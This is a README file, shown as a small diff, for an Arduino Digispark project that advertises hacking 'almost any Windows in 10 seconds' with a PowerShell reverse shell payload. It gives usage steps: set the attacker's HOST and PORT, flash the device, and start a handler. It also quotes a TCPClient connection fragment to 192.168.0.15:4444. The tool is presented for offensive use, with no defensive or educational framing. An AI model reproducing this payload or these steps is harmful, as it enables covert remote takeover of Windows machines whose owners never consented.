marcosvitti/Arduino-Digispark-PS-reverse-shell/README.md

 > Hack almost any Windows in 10 seconds with Digispark reverse connection payload.

 ## Usage
-- First you must change HOST and PORT in PS-reverse-shell.ino and finally load the program in Digispark;
+- First you must change HOST and PORT in PS-reverse-shell.ino and finally load the program in Digispark;<br>
 E.g: `...Net.Sockets.TCPClient('192.168.0.15',4444)...`

 - Start handler to get reverse connection;<br>